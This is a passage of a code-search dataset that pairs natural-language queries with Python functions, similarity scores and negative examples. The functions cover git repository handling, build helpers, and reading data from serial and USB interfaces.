gitconf.has_option(\"core\", \"worktree\"):\n self._working_tree_dir = gitconf.get(\"core\", \"worktree\")\n if \"GIT_WORK_TREE\" in os.environ:\n self._working_tree_dir = os.getenv(\"GIT_WORK_TREE\")\n break\n\n dotgit = osp.join(curpath, \".git\")\n sm_gitpath = find_submodule_git_dir(dotgit)\n if sm_gitpath is not None:\n git_dir = osp.normpath(sm_gitpath)\n\n sm_gitpath = find_submodule_git_dir(dotgit)\n if sm_gitpath is None:\n sm_gitpath = find_worktree_git_dir(dotgit)\n\n if sm_gitpath is not None:\n git_dir = expand_path(sm_gitpath, expand_vars)\n self._working_tree_dir = curpath\n break\n\n if not search_parent_directories:\n break\n curpath, tail = osp.split(curpath)\n if not tail:\n break\n # END while curpath\n\n if git_dir is None:\n raise InvalidGitRepositoryError(epath)\n self.git_dir = git_dir\n\n self._bare = False\n try:\n self._bare = self.config_reader(\"repository\").getboolean(\"core\", \"bare\")\n except Exception:\n # lets not assume the option exists, although it should\n pass\n\n try:\n common_dir = (Path(self.git_dir) / \"commondir\").read_text().splitlines()[0].strip()\n self._common_dir = osp.join(self.git_dir, common_dir)\n except OSError:\n self._common_dir = \"\"\n\n # adjust the wd in case we are actually bare - we didn't know that\n # in the first place\n if self._bare:\n self._working_tree_dir = None\n # END working dir handling\n\n self.working_dir: PathLike = self._working_tree_dir or self.common_dir\n self.git = self.GitCommandWrapperType(self.working_dir)\n\n # special handling, in special times\n rootpath = osp.join(self.common_dir, \"objects\")\n if issubclass(odbt, GitCmdObjectDB):\n self.odb = odbt(rootpath, self.git)\n else:\n self.odb = odbt(rootpath)",
"def generate(env):\n## doxyfile_scanner = env.Scanner(## DoxySourceScan,\n## \"DoxySourceScan\",\n## scan_check = DoxySourceScanCheck,\n##)\n\n if targz.exists(env):\n srcdist_builder = targz.makeBuilder(srcDistEmitter)\n\n env['BUILDERS']['SrcDist'] = srcdist_builder",
"def make_source_dir():\n\n os.makedirs(files['source_dir'].rel)",
"def build(self):\n \n # create db with empty tables\n dbpath, config = self.setup()\n \n # avoid work if setup decided db exists and build can be skipped\n if dbpath is None:\n return \n \n # check prerequisite files \n obopath = check_file(config.obo, dbpath, \"obo\")\n refpath = check_file(config.reference_phenotypes, dbpath, \n \"reference_phenotypes\")\n freqpath = check_file(config.phenotype_frequencies, dbpath,\n \"phenotype_frequencies\")\n\n self.logger.msg1(\"Loading ontology\") \n obo = MinimalObo(obopath, True)\n \n self.logger.msg1(\"Preparing phenotype frequencies\")\n fill_phenotype_frequency_table(dbpath, freqpath)\n \n # fill database with data\n self.logger.msg1(\"Preparing references\")\n fill_concise_reference_table(dbpath, refpath) \n fill_complete_reference_table(dbpath, obo, config) \n \n self._end()",
"def dest_repo_tree(dest_repo_no_tree):\n repo = dest_repo_no_tree\n\n # Create and commit a file\n fpath = os.path.join(repo.working_dir, \"something.txt\")\n with open(fpath, \"w\") as f:\n f.write(\"Mundul vult decipi, ergo decipiatur.\")\n repo.index.add([fpath])\n repo.index.commit(\"Dummy commit\")\n\n yield repo",
"def init(\n cls,\n path: Union[PathLike, None] = None,\n mkdir: bool = True,\n odbt: Type[GitCmdObjectDB] = GitCmdObjectDB,\n expand_vars: bool = True,\n **kwargs: Any,\n ) -> \"Repo\":\n if path:\n path = expand_path(path, expand_vars)\n if mkdir and path and not osp.exists(path):\n os.makedirs(path, 0o755)\n\n # git command automatically chdir into the directory\n git = cls.GitCommandWrapperType(path)\n git.init(**kwargs)\n return cls(path, odbt=odbt)",
"def build(self, gyp_file, target=None, **kw):\n raise NotImplementedError",
"def build_a_bear():\n if os.path.isdir(c.BEAR_PREFIX):\n logging.debug(\"skipping Bear installation\")\n return\n\n # download\n if not os.path.isfile(c.BEAR_ARCHIVE):\n curl = get_cmd_or_die(\"curl\")\n curl['-s', c.BEAR_URL, '-o', c.BEAR_ARCHIVE] & pb.TEE\n\n # remove any existing build dir since we don't know if\n # bear was built for the current host environment.\n if os.path.isdir(c.BEAR_SRC):\n shutil.rmtree(c.BEAR_SRC, ignore_errors=True)\n\n # unpack\n tar = get_cmd_or_die(\"tar\")\n with pb.local.cwd(c.DEPS_DIR):\n tar['xf', c.BEAR_ARCHIVE] & pb.TEE\n\n # cmake\n bear_build_dir = os.path.join(c.BEAR_SRC, \"build\")\n bear_install_prefix = \"-DCMAKE_INSTALL_PREFIX=\" + c.BEAR_PREFIX\n ensure_dir(bear_build_dir)\n with pb.local.cwd(bear_build_dir):\n cmake = get_cmd_or_die(\"cmake\")\n cmake[\"..\", bear_install_prefix] & pb.TEE\n make = get_cmd_or_die(\"make\")\n make[\"install\"] & pb.TEE",
"def build(self):\n raise NotImplementedError(\"This should have been implemented.\")",
"def test_build(self):\r\n self.mkbundle('file1', 'file2', output=\"out\").build()\r\n assert self.get(\"media/out\") == \"foo\\nbar\"",
"def make_package(tmp_path, pyproject_toml):\n return make_package_base(tmp_path, pyproject_toml)",
"def build(self, source_dir_path, output_path):\n env = {}\n env.update(self.osutils.environ)\n env.update({\"GOOS\": \"linux\", \"GOARCH\": self.goarch})\n runtime_path = self.binaries[self.LANGUAGE].binary_path\n cmd = [runtime_path, \"build\"]\n if self.trim_go_path:\n LOG.debug(\"Trimpath requested: Setting go build configuration to -trimpath\")\n cmd += [\"-trimpath\"]\n if self.mode and self.mode.lower() == BuildMode.DEBUG:\n LOG.debug(\"Debug build requested: Setting configuration to Debug\")\n cmd += [\"-gcflags\", \"all=-N -l\"]\n cmd += [\"-o\", output_path, source_dir_path]\n\n p = self.osutils.popen(cmd, cwd=source_dir_path, env=env, stdout=self.osutils.pipe, stderr=self.osutils.pipe)\n out, err = p.communicate()\n\n if p.returncode != 0:\n LOG.debug(err.decode(\"utf8\").strip())\n LOG.debug(\"Go files not found. Attempting to build for Go files in a different directory\")\n process, p_out, p_err = self._attempt_to_build_from_handler(cmd, source_dir_path, env)\n if process.returncode != 0:\n raise BuilderError(message=p_err.decode(\"utf8\").strip())\n return p_out.decode(\"utf8\").strip()\n\n return out.decode(\"utf8\").strip()",
"def build(buildout=None, newest=False):\n n = 'n' if newest else 'N'\n with cd(path()):\n if not buildout: # then use the deployment config\n buildout = '../{buildout}'.format(buildout=deploy_cfg())\n if not remote_exists(buildout, use_sudo=True):\n buildout = buildout[3:]\n sudo('bin/buildout -{n} -c {buildout}'.format(buildout=buildout, n=n),\n user=env.account)",
"def file(c, path=local.http_path):\r\n c = conn(c)\r\n print(\"make file repo on {}, path [{}]\".format(c.host, path))\r\n\r\n system.install(c, 'createrepo')\r\n c.run('createrepo {}'.format(path))",
"def __gitBundle(self):\n self.vcs.gitBundle(self.project.getProjectPath())",
"def create_branch(self):\n os.chdir(str(self.repository_path))\n sh.git.checkout('master')\n sh.git.checkout('-b', self.branch)\n logger.debug('Branch {} created', self.branch)",
"def b2d(homedir, branch):\n return os.path.join(homedir, 'integ', branch, 'integ')",
"def bundle(self):\n with tempfile.TemporaryDirectory(dir=self.tmp_dir) as tmp_dir:\n bundle_dir = join(tmp_dir, 'bundle')\n make_dir(bundle_dir)\n\n for fn in self.config.backend.get_bundle_filenames():\n path = download_if_needed(\n join(self.config.train_uri, fn), tmp_dir)\n shutil.copy(path, join(bundle_dir, fn))\n\n if file_exists(self.config.analyze_uri, include_dir=True):\n sync_to_dir(self.config.analyze_uri, join(\n bundle_dir, 'analyze'))\n\n path = download_if_needed(self.config.get_config_uri(), tmp_dir)\n shutil.copy(path, join(bundle_dir, 'pipeline-config.json'))\n\n model_bundle_uri = self.config.get_model_bundle_uri()\n model_bundle_path = get_local_path(model_bundle_uri, self.tmp_dir)\n zipdir(bundle_dir, model_bundle_path)\n upload_or_copy(model_bundle_path, model_bundle_uri)",
"def build():\n local('python' + python_version + ' setup.py bdist_egg')",
"def branched_repo(tmp_path_factory):\n tmpdir = tmp_path_factory.mktemp(\"branched_repo\")\n git_repo = GitRepoFixture.create_repository(tmpdir)\n git_repo.add(\n {\n \"del_master.py\": \"original\",\n \"del_branch.py\": \"original\",\n \"del_index.py\": \"original\",\n \"del_worktree.py\": \"original\",\n \"mod_master.py\": \"original\",\n \"mod_branch.py\": \"original\",\n \"mod_both.py\": \"original\",\n \"mod_same.py\": \"original\",\n \"keep.py\": \"original\",\n },\n commit=\"Initial commit\",\n )\n branch_point = git_repo.get_hash()\n git_repo.add(\n {\n \"del_master.py\": None,\n \"add_master.py\": \"master\",\n \"mod_master.py\": \"master\",\n \"mod_both.py\": \"master\",\n \"mod_same.py\": \"same\",\n },\n commit=\"master\",\n )\n git_repo.create_branch(\"branch\", branch_point)\n git_repo.add(\n {\n \"del_branch.py\": None,\n \"mod_branch.py\": \"branch\",\n \"mod_both.py\": \"branch\",\n \"mod_same.py\": \"same\",\n },\n commit=\"branch\",\n )\n git_repo.add(\n {\"del_index.py\": None, \"add_index.py\": \"index\", \"mod_index.py\": \"index\"}\n )\n (git_repo.root / \"del_worktree.py\").unlink()\n (git_repo.root / \"add_worktree.py\").write_bytes(b\"worktree\")\n (git_repo.root / \"mod_worktree.py\").write_bytes(b\"worktree\")\n return git_repo",
"def fresh_directory():\n os.chdir(tempfile.mkdtemp())",
"def _build(self):\n raise NotImplementedError()",
"def build_tree(self):\n active = self.get_active()\n family = self.dbstate.db.get_family_from_handle(active)\n self.goto_handle(handle=family)"
] | [
"0.59951997",
"0.5941467",
"0.58681095",
"0.5856485",
"0.57614243",
"0.5617354",
"0.5611247",
"0.5596623",
"0.558593",
"0.5584332",
"0.5543917",
"0.5542992",
"0.54703754",
"0.544997",
"0.544899",
"0.54458034",
"0.5438347",
"0.54342854",
"0.54192024",
"0.5414548",
"0.5387722",
"0.53791815",
"0.5356261",
"0.53389066",
"0.5333958",
"0.5315344",
"0.5293159",
"0.5242",
"0.5220701",
"0.5203907",
"0.5148621",
"0.51422024",
"0.5125289",
"0.51201195",
"0.51104254",
"0.5109865",
"0.5104615",
"0.5090442",
"0.5078938",
"0.50752383",
"0.50712955",
"0.50712955",
"0.5062582",
"0.505916",
"0.50382864",
"0.5037849",
"0.5034091",
"0.5033202",
"0.5031987",
"0.503083",
"0.5014627",
"0.5014627",
"0.50139487",
"0.5003795",
"0.49933693",
"0.4990424",
"0.49887413",
"0.4983308",
"0.4978359",
"0.4976066",
"0.4975368",
"0.49716315",
"0.49677113",
"0.49663535",
"0.49499708",
"0.49466112",
"0.49436212",
"0.49189246",
"0.49080104",
"0.4901853",
"0.489447",
"0.48932713",
"0.4892421",
"0.4891708",
"0.4889511",
"0.4871684",
"0.48709378",
"0.48707587",
"0.48667017",
"0.48608962",
"0.486034",
"0.4844849",
"0.48421755",
"0.48364314",
"0.48334193",
"0.48330128",
"0.48255265",
"0.48234943",
"0.4820455",
"0.48192635",
"0.48183712",
"0.4816425",
"0.48150423",
"0.48135266",
"0.48121986",
"0.4809994",
"0.48033762",
"0.48026362",
"0.47949624",
"0.47942722"
] | 0.7293197 | 0 |
Read data from the serial interface. | def s_read(self, timeout = 1):
if self.s.is_open:
data = []
b = bytearray()
try:
self.s.timeout = 3
data = self.s.read(1)
if not len(data):
return b
self.s.timeout = .04
data += self.s.read(500)
except Exception as e:
print("Could not read from port" + str(e))
start = data.find(b'\x7e')
end = data.find(b'\x7f')
txt_start = b''
txt_end = b''
if start < 0:
txt_start = data
elif end < 0:
txt_start = data
else:
txt_start = data[0:start]
txt_end = data[end+1:]
txt = txt_start + txt_end
if len(txt):
if self.log_ascii:
self.logfile.write(txt)
# End logging
if Connection.START_UP_STRING in data:
raise Reset_Exception('ChipSHOUTER unit has reset - wait 5 seconds then reinitialize.')
if start < 0 or end < 0 or end < start:
b = bytearray()
return b
if self.log_input:
self.logfile.write('\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\n')
b.extend(data[start:end])
return b
else:
raise IOError('Comport is not open, use ctl_connect()') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _serial_read(self, size):\n self.write([self.SERIAL_IO])\n resp = self.read(size)\n data = self.decode(resp)\n return data",
"def read_from_serial(self):\n self.running = True\n while self.running:\n data = self.serial.readline().decode()\n if \"DATA\" not in data:\n print(\"ERREUR : {}\".format(data))\n continue\n\n try:\n _, hum, tem = data.split(\" \")\n hum = float(hum)\n tem = float(tem)\n except Exception as e:\n print(\"ERREUR : ligne nulle {}\".format(e))\n else:\n self.data.append([datetime.datetime.now(), hum, tem])",
"def read_buffer(serial):\r\n resp = serial.read_all()\r\n return resp.decode()",
"def read_serial_data(self):\n qdata = list(get_all_from_queue(self.data_q))\n if len(qdata) > 0:\n data = self.data+''.join(qdata)\n while data.find(\"Id: \")!=-1:\n msgStart = data.find(\"Id: \")\n msgEnd = data.find(\"\\n\",msgStart)\n if msgEnd == -1:\n break\n\n packet = data[msgStart:msgEnd-1]\n # print \"msg: [%s]\" % packet\n msgId = int(packet[4:8],16)\n # print \"msgId: %d [%x]\" % (msgId, msgId)\n msgData = map(lambda x: int(x,16) ,packet[16:].split(\" \"))\n # print \"data: \", msgData\n self.update_data(msgId, msgData)\n\n data = data[msgEnd:]\n self.data = data",
"def read_from_serial(self):\n output = b''\n time.sleep(self._sleep_time)\n while self._ser.inWaiting() > 0:\n output = output + self._ser.read(1)\n #A default ten powercycle delay means that some measurements may still be processing\n #by the time the read function is called. This slows down the read but ensures that\n #it will finish (per my testing). There is probably a better way to do this. TODO\n time.sleep(0.06)\n return output.decode('utf-8').strip()",
"def read_serial_data(serial):\n serial.flushInput()\n \n serial_data = []\n readings_left = True\n timeout_reached = False\n \n while readings_left and not timeout_reached:\n serial_line = serial.readline()\n if serial_line == '':\n timeout_reached = True\n else:\n serial_data.append(serial_line)\n if len(serial_data) == max_num_readings:\n readings_left = False\n \n return serial_data",
"def run(self):\n self.read_from_serial()",
"def reader(self):\n while self.alive:\n try:\n if controlEvent.isSet() == False:\n break\n data = self.serial.read(1) # read one, blocking\n n = self.serial.inWaiting() # look if there is more\n if n:\n data = data + self.serial.read(n) # and get as much as possible\n if data:\n # the spy shows what's on the serial port, so log it before converting newlines\n if self.spy:\n sys.stdout.write(codecs.escape_encode(data)[0])\n sys.stdout.flush()\n #if self.ser_newline and self.net_newline:\n # do the newline conversion\n # XXX fails for CR+LF in input when it is cut in half at the begin or end of the string\n #data = net_newline.join(data.split(ser_newline))\n # escape outgoing data when needed (Telnet IAC (0xff) character)\n self._write_lock.acquire()\n try:\n # Only send data to socket if it is in active state\n if controlEvent.isSet() == True:\n self.socket.sendall(data) # send it over TCP\n except Exception, msg:\n sys.stderr.write('reader Socket ERROR IOError: %s\\n' % msg)\n finally:\n self._write_lock.release()\n except IOError, msg:\n sys.stderr.write('reader ERROR IOError: %s\\n' % msg)\n break\n except socket.error, msg:\n sys.stderr.write('reader ERROR socket.error: %s\\n' % msg)\n break\n except Exception, msg:\n sys.stderr.write('reader ERROR Other Exception: %s\\n' % msg)\n break",
"def read_and_print(serial):\r\n resp = read_buffer(serial)\r\n if resp != \"\":\r\n print(resp)",
"def serial_read(useParse=False, header='$', tail='#'):\n global ser, recvBuff, startRecord\n retData = ''\n if useParse:\n if ser.readable():\n while ser.inWaiting():\n c = ser.read(1)\n if c == header:\n startRecord = True\n recvBuff = ''\n elif c == tail:\n startRecord = False\n if recvBuff != '':\n #print 'I get: ', recvBuff\n retData = recvBuff\n elif startRecord:\n recvBuff += c\n else:\n pass\n else:\n print 'The serial', ser.portstr, 'cannot be read.'\n pass\n else:\n if ser.readable():\n while ser.inWaiting():\n retData += ser.read(1)\n else:\n print 'The serial', ser.portstr, 'cannot be read.'\n pass\n return retData",
"def worker_serial_read(self):\r\n while self.active_flag.is_set():\r\n if not self.data_recieved_flag.is_set() and self.serial_data.in_waiting > 0:\r\n # strtmp=self.serial_data.read_until(b'\\x02\\x01\\x04\\x03\\x06\\x05\\x08\\x07');\r\n strtmp = self.serial_data.read_all()\r\n if (strtmp != b''):\r\n # self.buffer_busy_flag.wait();\r\n self.buffer_busy_flag.clear()\r\n # self.recieved_data=[self.recieved_data,strtmp];\r\n self.recieved_data = strtmp\r\n self.buffer_busy_flag.set()\r\n self.data_recieved_flag.set()\r\n else:\r\n time.sleep(0.001)\r\n\r\n return",
"def readline(self):\n try:\n output = self.ser.readline()\n return output\n except SerialException as se:\n log.debug('Serial connection read error: {}'.format(se))\n return None",
"def _read_v1(self):\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.interface, self.usb_rd_timeout)",
"def read(self):\n try:\n while self.Serial.in_waiting:\n c = self.Serial.read().decode()\n if c != \"\\n\":\n self.buffer += c\n else:\n return self.parse_telemetry()\n except:\n pass\n\n return None",
"def _read(self, timeout=None):\n\n # Developer notes:\n #\n # Packet data read from Serial is in this format:\n # [HDLC_FLAG_BYTE][Escaped data][HDLC_FLAG_BYTE]\n #\n # [Escaped data] is encoded so that [HDLC_FLAG_BYTE] byte\n # values cannot occur within it. When [Escaped data] has been\n # unescaped, the last 2 bytes are a 16-bit CRC of the earlier\n # part of the packet (excluding the initial HDLC_FLAG_BYTE\n # byte)\n #\n # It's also possible that the serial device was half-way\n # through transmitting a packet when this function was called\n # (app was just started). So we also neeed to handle this case:\n #\n # [Incomplete escaped data][HDLC_FLAG_BYTE][HDLC_FLAG_BYTE][Escaped data][HDLC_FLAG_BYTE]\n #\n # In this case we skip over the first (incomplete) packet.\n #\n\n if self._s.timeout != timeout and timeout != None:\n if self._debug:\n print \"Set the timeout to %s, previous one was %s\" % (timeout, self._s.timeout)\n self._s.timeout = timeout\n\n try:\n # Read bytes until we get to a HDLC_FLAG_BYTE value\n # (either the end of a packet, or the start of a new one)\n d = self._get_byte(timeout)\n ts = time.time()\n if self._debug and d != self.HDLC_FLAG_BYTE:\n print \"Skipping incomplete packet\"\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte(timeout)\n ts = time.time()\n\n # Store HDLC_FLAG_BYTE at the start of the retrieved packet\n # data:\n packet = [d]\n\n # Is the next byte also HDLC_FLAG_BYTE?\n d = self._get_byte(timeout)\n if d == self.HDLC_FLAG_BYTE:\n # Yes. This means that the previous byte was for\n # the end of the previous packet, and this byte is for\n # the start of the next packet.\n\n # Get the 2nd byte of the new packet:\n d = self._get_byte(timeout)\n ts = time.time()\n\n # We are now on the 2nd byte of the packet. Add it to\n # our retrieved packet data:\n packet.append(d)\n\n # Read bytes from serial until we read another\n # HDLC_FLAG_BYTE value (end of the current packet):\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte(timeout)\n packet.append(d)\n\n # Done reading a whole packet from serial\n if self._debug:\n print \"SimpleSerial:_read: unescaped\", packet\n\n # Decode the packet, and check CRC:\n packet = self._unescape(packet)\n\n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n\n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n raise ReadCRCError\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n\n # Packet was successfully retrieved, so return it in a\n # RawPacket wrapper object (but leave out the\n # HDLC_FLAG_BYTE and CRC bytes)\n return RawPacket(ts, packet[1:-3])\n except socket.timeout:\n raise ReadTimeoutError",
"def _serial_read(self, num_bytes):\n out = self.serial.read(num_bytes)\n if len(out) != num_bytes:\n self.log(\"WARNING: Didn't get the expected number of bytes\")\n self.log(\" Received {}, expected {}. Serial port dead?\".format(len(out), num_bytes))\n\n out_list = [int(v) for v in bytearray(out)]\n if self.verbose:\n self.log(\"Read in: {}\".format(\" \".join([\"{:0>2X}\".format(b) for b in out_list])))\n\n return out_list",
"def _read(self):\n while self._rxactive:\n try:\n rv = self._ep_in.read(self._ep_in.wMaxPacketSize)\n if self._isFTDI:\n status = rv[:2] # FTDI prepends 2 flow control characters,\n # modem status and line status of the UART\n if status[0] != 1 or status[1] != 0x60:\n log.info(\n \"USB Status: 0x{0:02X} 0x{1:02X}\".format(\n *status))\n rv = rv[2:]\n for rvi in rv:\n self._rxqueue.put(rvi)\n except usb.USBError as e:\n log.warn(\"USB Error on _read {}\".format(e))\n return\n \n time.sleep(self._rxinterval)",
"def read(self): \n s = \"\"\n \n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n\n l = self.ser.read(1) #Read 1 BYTE\n self.buffer.append(l)\n \n while len(self.buffer) > 0:\n s = s + self.buffer.popleft()\n\n return s",
"def _read_thread(self):\r\n\r\n while self._reading and self._serial_object:\r\n if self._serial_object.in_waiting:\r\n try:\r\n (raw_data, parsed_data) = self._ubxreader.read()\r\n # if raw_data:\r\n # print(raw_data)\r\n if parsed_data:\r\n print(parsed_data)\r\n except (\r\n ube.UBXStreamError,\r\n ube.UBXMessageError,\r\n ube.UBXTypeError,\r\n ube.UBXParseError,\r\n ) as err:\r\n print(f\"Something went wrong {err}\")\r\n continue",
"def data_available(self):\n\n self.run = True\n self.serial.reset_input_buffer()\n while self.run:\n if self.serial.in_waiting:\n data: str = self.serial.readline().decode(\"utf-8\")\n data = data.replace(\">>>\", \"\").lstrip()\n\n if len(data) > 0:\n self.output_text.config(state=NORMAL)\n self.output_text.insert(END, data)\n self.output_text.see(END)\n self.output_text.config(state=DISABLED)\n else:\n time.sleep(0.1)",
"def read_data(self):\n temperature_data = RS485.read_temperature(self.data_path)\n humidity_data = RS485.read_humidity(self.data_path)\n moisture_data = RH_010_GN.read_moisture(self.data_path)\n o2_data = LB_856.read_o2(self.data_path)\n co2_data = LB_856.read_co2(self.data_path)\n\n self.data = [temperature_data, humidity_data, moisture_data, o2_data, co2_data]",
"def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None",
"def __read(self):\n if not self.__port:\n print(\"cannot perform __read() when unconnected\")\n return []\n\n buffer = bytearray()\n\n while True:\n # retrieve as much data as possible\n data = self.__port.read()\n\n # if nothing was recieved\n if not data:\n print(\"Failed to read port\")\n break\n\n buffer.extend(data)\n\n # end on chevron (ELM prompt character)\n if self.ELM_PROMPT in buffer:\n break\n\n # log, and remove the \"bytearray( ... )\" part\n print(\"read: \" + repr(buffer)[10:-1])\n\n # clean out any null characters\n buffer = re.sub(b\"\\x00\", b\"\", buffer)\n\n # remove the prompt character\n if buffer.endswith(self.ELM_PROMPT):\n buffer = buffer[:-1]\n\n # convert bytes into a standard string\n string = buffer.decode()\n\n # splits into lines while removing empty lines and trailing spaces\n lines = [ s.strip() for s in re.split(\"[\\r\\n]\", string) if bool(s) ]\n\n return lines",
"def get_data(self):\n if self.ser.in_waiting:\n data_string = self.ser.readline().decode().strip()\n if not data_string: return self.data\n self.data = [\n float(element) for element in data_string.split()\n ]\n self.ser.reset_input_buffer()\n return self.data",
"def getData(self,cmd):\n self.ser.write(cmd.encode()+END.encode())\n out = self.ser.readline()\n\n if(out == \"\"):\n raise IOError(\"communication failed\")\n return out",
"def Read_Bytes(self, size = 0):\r\n if size == 0: size = self.Port.inWaiting()\r\n data = self.Port.read(size)\r\n return data",
"def read(self, nbytes):\n utils.print_for_unimplemented_functions(SPI.read.__name__)\n telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_SPI)",
"def _read_v2(self):\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.usb_rd_timeout)",
"def receive(serial_port, timeout=None):\n raw_message = serial_port.readline()\n\n debug and print(\"client:\", raw_message, \":\")\n\n message = raw_message.decode('ascii')\n\n return message.rstrip(\"\\n\\r\")",
"def _get_data(self, read_size):\n return self._character_device.read(read_size)",
"def recive_data(self):\n # read all available data\n while self.ser.inWaiting() > self.INPUT_DATA_SIZE+1:\n data = array.array('c')\n # search the header\n data.append(self.ser.read(1))\n while data[0] != chr(1):\n data[0] = self.ser.read(1)\n \n # wait for all available data\n while self.ser.inWaiting() < (self.INPUT_DATA_SIZE-1):\n time.sleep(0.03);\n \n # recives data\n data = self.ser.read(self.INPUT_DATA_SIZE-1)\n \n # prove if you want graphical data\n if self.pushButton_monitor.isChecked():\n # decodes the data\n t = struct.unpack('I', data[3]+data[2]+data[1]+data[0])\n r = struct.unpack('f', data[4]+data[5]+data[6]+data[7])\n x0 = struct.unpack('f', data[8]+data[9]+data[10]+data[11])\n x1 = struct.unpack('f', data[12]+data[13]+data[14]+data[15])\n u = struct.unpack('f', data[16]+data[17]+data[18]+data[19])\n \n self.time = t[0]*25e-9\n \n # prepare the string output\n aux_str = \" t = \"+str(self.time)+\"\\t\"\n aux_str += \" r = \"+str(r[0])+\"\\t\"\n aux_str += \" u = \"+str(u[0])+\"\\t\"\n aux_str += \" x1 = \"+str(x1[0])+\"\\t\"\n aux_str += \" x0 = \"+str(x0[0])+\"\\n\"\n # print string output\n self.textBrowser.insertPlainText(aux_str)\n \n # append data to the arrays\n self.graf_t.append(self.time)\n self.graf_r.append(r[0])\n self.graf_x0.append(x0[0])\n self.graf_x1.append(x1[0])\n self.graf_u.append(u[0])\n \n # remove one value if the arrays have maximum length\n if self.graf_t.buffer_info()[1] >= NUM_SAMPLES:\n self.graf_t.pop(0)\n self.graf_r.pop(0)\n self.graf_x0.pop(0)\n self.graf_x1.pop(0)\n self.graf_u.pop(0)\n \n # reload number of samples lavel\n self.label_samples_value.setText(str(self.graf_t.buffer_info()[1]))\n # reload number of waiting chars in serial rx buffer\n self.label_rx_buff_value.setText(str(self.ser.inWaiting()))\n\n # reload mutex area\n self.updated_data = 1\n \n # prove if there are available id's\n if (self.actionPC_Monitor.isChecked() and data[20] == chr(2)):\n # if it is true, looks how much id's\n i = struct.unpack('B', data[21])\n\n if i[0] < STACK_SIZE:\n for z in range(i[0]):\n new_device = struct.unpack('B', data[z+22])\n new_string = str(new_device[0])\n \n llista = self.listWidget_link.findItems(new_string, QtCore.Qt.MatchExactly)\n if len(llista) == 0:\n self.listWidget_link.addItem(new_string)",
"def doRead(self):\n return fdesc.readFromFD(self.fileno(), self.protocol.dataReceived)",
"def read(self, wait_sleep=0.3) -> bytes:\n # return everything currently in device buffer i.e. may be incomplete so wait a bit before read\n time.sleep(wait_sleep)\n # in pyserial==3.5 method added .read_all()\n # Read all bytes currently available in the buffer of the OS.\n # BUT... not available in pyserial==3.4\n # ADDITIONALLY, https://pyserial.readthedocs.io/en/latest/index.html says latest yet refers to 3.4\n # SO... lets make this requirement 3.4 and manually implement read_all()\n if hasattr(self._con, \"read_all\"):\n logger.debug(f\"read_all\")\n return self._con.read_all()\n else:\n # in_waiting - Return the number of bytes currently in the input buffer.\n logger.debug(f\"read(in_waiting)\")\n return self._con.read(self._con.in_waiting)",
"def readData(self):\n if (self.model == 'GDS'):\n self.write(':ACQ'+str(ch)+':MEM?\\n')\n elif (self.model == 'TDS'):\n self.write('CURVe?\\n')\n\n # Check for the initial '#'; if not present, raise error.\n if (self.read(1) != '#'):\n raise Exception, \"Expected header not present\"\n\n # Read the data length indicator\n dataSize = int(self.read(int(self.read(1))))\n\n # extra steps for GDS\n if (self.model == 'GDS'):\n # subtract the 8 bytes we will read.\n dataSize -= 8\n # Read the sampling period\n hstep = struct.unpack('>f', self.read(4))[0]\n # also, fix hoff so it corresponds with that for TDS\n # FIXME: check with the scope at some point.\n hoff = hoff - float(dataSize/4) * hstep\n # Read 4 bytes to advance to the actual data: first byte\n # contains the channel and the three are not used,\n # according to the GDS800 manual.\n self.read(4)\n \n # Read data; TDS expects a 1-byte data, GDS expects 2-byte one.\n if (self.model == 'TDS'):\n data = list(struct.unpack('>'+str(dataSize)+'b',\n self.read(dataSize)))\n # TDS has a trailing '\\n' that should be drained.\n self.read(1)\n elif (self.model == 'GDS'):\n data = list(struct.unpack('>'+str(dataSize/2)+'h',\n self.read(dataSize)))\n\n return data",
"def __get_response(serial_port):\n read_data = \"\"\n while not read_data.endswith(\"\\n>> \"):\n ready = select.select([serial_port], [], [], 25)[0]\n if ready:\n read_data += serial_port.read(serial_port.inWaiting()).decode(\n \"utf-8\", \"replace\")\n else:\n raise errors.DeviceError(\n \"Device cambrionix get response failed. \"\n \"Read timeout on serial port: {}\".format(serial_port))\n\n return read_data.splitlines()",
"def _read_arduino(self) -> np.ndarray:\r\n raw_data: bytes = self._serial_handle.read(self._chunk)\r\n int_data = [int(data_bit) for data_bit in raw_data]\r\n return np.array(int_data)",
"def receive_data():\n\n while True:\n try:\n bytes_to_read = ser.readline()\n print(bytes_to_read)\n data = json.loads(bytes_to_read.decode('utf-8'))\n distance = data['distance']\n print(f'distance: {distance}')\n except Exception as e:\n print(f'Error in reading bytes from the \\'duino: {e}')",
